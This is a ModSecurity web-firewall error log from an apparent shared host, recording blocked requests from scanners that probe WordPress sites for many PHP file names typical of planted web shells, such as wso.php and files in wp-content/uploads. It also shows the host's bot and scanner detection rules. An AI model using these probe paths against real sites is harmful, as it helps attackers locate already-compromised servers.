[Tue May 26 13:11:36.262705 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:35578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVOsOvOeft4ltnLrH4wlgAAABc"]
[Tue May 26 13:11:36.262852 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:35578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVOsOvOeft4ltnLrH4wlgAAABc"]
[Tue May 26 13:11:36.288874 2026] [security2:error] [pid 496740:tid 496792] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-signup.php"] [unique_id "ahVOsOvOeft4ltnLrH4wlwAAAjM"]
[Tue May 26 13:11:36.405615 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws83.php"] [unique_id "ahVOsOvOeft4ltnLrH4wnAAAABE"]
[Tue May 26 13:11:36.405742 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:35542] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws83.php"] [unique_id "ahVOsOvOeft4ltnLrH4wnAAAABE"]
[Tue May 26 13:11:36.459895 2026] [security2:error] [pid 496740:tid 496918] [client 74.7.228.54:59202] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "traderscafe.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOsOvOeft4ltnLrH4wnQAAMDs"]
[Tue May 26 13:11:36.462377 2026] [security2:error] [pid 496740:tid 496802] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-activate.php"] [unique_id "ahVOsOvOeft4ltnLrH4wngAAMT0"]
[Tue May 26 13:11:36.549407 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:28899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/atex1.php"] [unique_id "ahVOsOvOeft4ltnLrH4wogAAAFE"]
[Tue May 26 13:11:36.549541 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:28899] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/atex1.php"] [unique_id "ahVOsOvOeft4ltnLrH4wogAAAFE"]
[Tue May 26 13:11:36.691750 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/class-t.api.php"] [unique_id "ahVOsOvOeft4ltnLrH4wqwAAAAc"]
[Tue May 26 13:11:36.691851 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16030] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/class-t.api.php"] [unique_id "ahVOsOvOeft4ltnLrH4wqwAAAAc"]
[Tue May 26 13:11:36.834166 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:27648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/w.php"] [unique_id "ahVOsOvOeft4ltnLrH4wsQAAAGg"]
[Tue May 26 13:11:36.834312 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:27648] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/w.php"] [unique_id "ahVOsOvOeft4ltnLrH4wsQAAAGg"]
[Tue May 26 13:11:36.977358 2026] [security2:error] [pid 496740:tid 496987] [client 20.151.117.104:27707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/bless.php"] [unique_id "ahVOsOvOeft4ltnLrH4wtgAAAHU"]
[Tue May 26 13:11:36.977468 2026] [security2:error] [pid 496740:tid 496987] [client 20.151.117.104:27707] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/bless.php"] [unique_id "ahVOsOvOeft4ltnLrH4wtgAAAHU"]
[Tue May 26 13:11:37.124317 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:11989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sagax1.php"] [unique_id "ahVOsevOeft4ltnLrH4wugAAAGQ"]
[Tue May 26 13:11:37.124435 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:11989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sagax1.php"] [unique_id "ahVOsevOeft4ltnLrH4wugAAAGQ"]
[Tue May 26 13:11:37.266701 2026] [security2:error] [pid 496740:tid 496948] [client 20.151.117.104:42051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wpc.php"] [unique_id "ahVOsevOeft4ltnLrH4wxwAAAE4"]
[Tue May 26 13:11:37.266799 2026] [security2:error] [pid 496740:tid 496948] [client 20.151.117.104:42051] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wpc.php"] [unique_id "ahVOsevOeft4ltnLrH4wxwAAAE4"]
[Tue May 26 13:11:37.409100 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:27668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/fone1.php"] [unique_id "ahVOsevOeft4ltnLrH4wyAAAAFo"]
[Tue May 26 13:11:37.409217 2026] [security2:error] [pid 496740:tid 496960] [client 20.151.117.104:27668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/fone1.php"] [unique_id "ahVOsevOeft4ltnLrH4wyAAAAFo"]
[Tue May 26 13:11:37.553389 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:16163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ncx.php"] [unique_id "ahVOsevOeft4ltnLrH4w0gAAABc"]
[Tue May 26 13:11:37.553502 2026] [security2:error] [pid 496740:tid 496893] [client 20.151.117.104:16163] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ncx.php"] [unique_id "ahVOsevOeft4ltnLrH4w0gAAABc"]
[Tue May 26 13:11:37.697467 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVOsevOeft4ltnLrH4w2QAAADA"]
[Tue May 26 13:11:37.697546 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:44937] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVOsevOeft4ltnLrH4w2QAAADA"]
[Tue May 26 13:11:37.841212 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:12540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wso.php"] [unique_id "ahVOsevOeft4ltnLrH4w4wAAAFE"]
[Tue May 26 13:11:37.841311 2026] [security2:error] [pid 496740:tid 496951] [client 20.151.117.104:12540] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wso.php"] [unique_id "ahVOsevOeft4ltnLrH4w4wAAAFE"]
[Tue May 26 13:11:37.985716 2026] [security2:error] [pid 496740:tid 496940] [client 20.151.117.104:40687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/zup.php73"] [unique_id "ahVOsevOeft4ltnLrH4w5wAAAEY"]
[Tue May 26 13:11:37.985842 2026] [security2:error] [pid 496740:tid 496940] [client 20.151.117.104:40687] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/zup.php73"] [unique_id "ahVOsevOeft4ltnLrH4w5wAAAEY"]
[Tue May 26 13:11:38.095331 2026] [security2:error] [pid 496740:tid 496814] [remote 74.7.241.58:59376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVOsuvOeft4ltnLrH4w6wAAPUk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:11:38.137605 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:42083] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/k.php"] [unique_id "ahVOsuvOeft4ltnLrH4w7QAAAFY"]
[Tue May 26 13:11:38.137734 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:42083] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/k.php"] [unique_id "ahVOsuvOeft4ltnLrH4w7QAAAFY"]
[Tue May 26 13:11:38.285455 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:54446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-blink.php"] [unique_id "ahVOsuvOeft4ltnLrH4w9wAAAFg"]
[Tue May 26 13:11:38.285587 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:54446] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-blink.php"] [unique_id "ahVOsuvOeft4ltnLrH4w9wAAAFg"]
[Tue May 26 13:11:38.434340 2026] [security2:error] [pid 496740:tid 496973] [client 20.151.117.104:16146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOsuvOeft4ltnLrH4w-AAAAGc"]
[Tue May 26 13:11:38.509827 2026] [security2:error] [pid 496740:tid 496916] [client 20.151.117.104:16146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOsuvOeft4ltnLrH4w_QAAAC4"]
[Tue May 26 13:11:38.582766 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:16146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOsuvOeft4ltnLrH4xAwAAACw"]
[Tue May 26 13:11:38.654603 2026] [security2:error] [pid 496740:tid 496946] [client 20.151.117.104:16146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ww5.php"] [unique_id "ahVOsuvOeft4ltnLrH4xBQAAAEw"]
[Tue May 26 13:11:38.654736 2026] [security2:error] [pid 496740:tid 496946] [client 20.151.117.104:16146] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ww5.php"] [unique_id "ahVOsuvOeft4ltnLrH4xBQAAAEw"]
[Tue May 26 13:11:38.797827 2026] [security2:error] [pid 496740:tid 496912] [client 20.151.117.104:54403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/2.php"] [unique_id "ahVOsuvOeft4ltnLrH4xCwAAACo"]
[Tue May 26 13:11:38.797920 2026] [security2:error] [pid 496740:tid 496912] [client 20.151.117.104:54403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/2.php"] [unique_id "ahVOsuvOeft4ltnLrH4xCwAAACo"]
[Tue May 26 13:11:38.942578 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:39999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVOsuvOeft4ltnLrH4xEQAAAGA"]
[Tue May 26 13:11:38.942685 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:39999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahVOsuvOeft4ltnLrH4xEQAAAGA"]
[Tue May 26 13:11:39.085575 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:16136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/atomlib.php"] [unique_id "ahVOs-vOeft4ltnLrH4xFQAAADA"]
[Tue May 26 13:11:39.085713 2026] [security2:error] [pid 496740:tid 496918] [client 20.151.117.104:16136] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/atomlib.php"] [unique_id "ahVOs-vOeft4ltnLrH4xFQAAADA"]
[Tue May 26 13:11:39.114081 2026] [security2:error] [pid 496740:tid 496919] [client 216.244.66.241:51976] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/miryfcba/eaeeca2010037.shtml"] [unique_id "ahVOs-vOeft4ltnLrH4xFgAAADE"]
[Tue May 26 13:11:39.114221 2026] [security2:error] [pid 496740:tid 496919] [client 216.244.66.241:51976] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/miryfcba/eaeeca2010037.shtml"] [unique_id "ahVOs-vOeft4ltnLrH4xFgAAADE"]
[Tue May 26 13:11:39.228032 2026] [security2:error] [pid 496740:tid 496961] [client 20.151.117.104:14299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/p.php"] [unique_id "ahVOs-vOeft4ltnLrH4xHAAAAFs"]
[Tue May 26 13:11:39.228113 2026] [security2:error] [pid 496740:tid 496961] [client 20.151.117.104:14299] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/p.php"] [unique_id "ahVOs-vOeft4ltnLrH4xHAAAAFs"]
[Tue May 26 13:11:39.370405 2026] [security2:error] [pid 496740:tid 496905] [client 20.151.117.104:14305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/php.php"] [unique_id "ahVOs-vOeft4ltnLrH4xJAAAACM"]
[Tue May 26 13:11:39.370512 2026] [security2:error] [pid 496740:tid 496905] [client 20.151.117.104:14305] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/php.php"] [unique_id "ahVOs-vOeft4ltnLrH4xJAAAACM"]
[Tue May 26 13:11:39.516496 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:54403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/test1.php"] [unique_id "ahVOs-vOeft4ltnLrH4xKAAAAFY"]
[Tue May 26 13:11:39.516614 2026] [security2:error] [pid 496740:tid 496956] [client 20.151.117.104:54403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/test1.php"] [unique_id "ahVOs-vOeft4ltnLrH4xKAAAAFY"]
[Tue May 26 13:11:39.659078 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVOs-vOeft4ltnLrH4xLQAAAAc"]
[Tue May 26 13:11:39.659158 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:16139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/uploads/min.php"] [unique_id "ahVOs-vOeft4ltnLrH4xLQAAAAc"]
[Tue May 26 13:11:39.801740 2026] [security2:error] [pid 496740:tid 496899] [client 20.151.117.104:28924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/zoom1.php"] [unique_id "ahVOs-vOeft4ltnLrH4xMQAAAB0"]
[Tue May 26 13:11:39.801851 2026] [security2:error] [pid 496740:tid 496899] [client 20.151.117.104:28924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/zoom1.php"] [unique_id "ahVOs-vOeft4ltnLrH4xMQAAAB0"]
[Tue May 26 13:11:39.858126 2026] [security2:error] [pid 496740:tid 496931] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOs-vOeft4ltnLrH4xJwAAAD0"]
[Tue May 26 13:11:39.944435 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:27650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/lock360.php"] [unique_id "ahVOs-vOeft4ltnLrH4xOAAAAFQ"]
[Tue May 26 13:11:39.944547 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:27650] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/lock360.php"] [unique_id "ahVOs-vOeft4ltnLrH4xOAAAAFQ"]
[Tue May 26 13:11:40.086461 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:44989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/b.php"] [unique_id "ahVOtOvOeft4ltnLrH4xQAAAACw"]
[Tue May 26 13:11:40.086542 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:44989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/b.php"] [unique_id "ahVOtOvOeft4ltnLrH4xQAAAACw"]
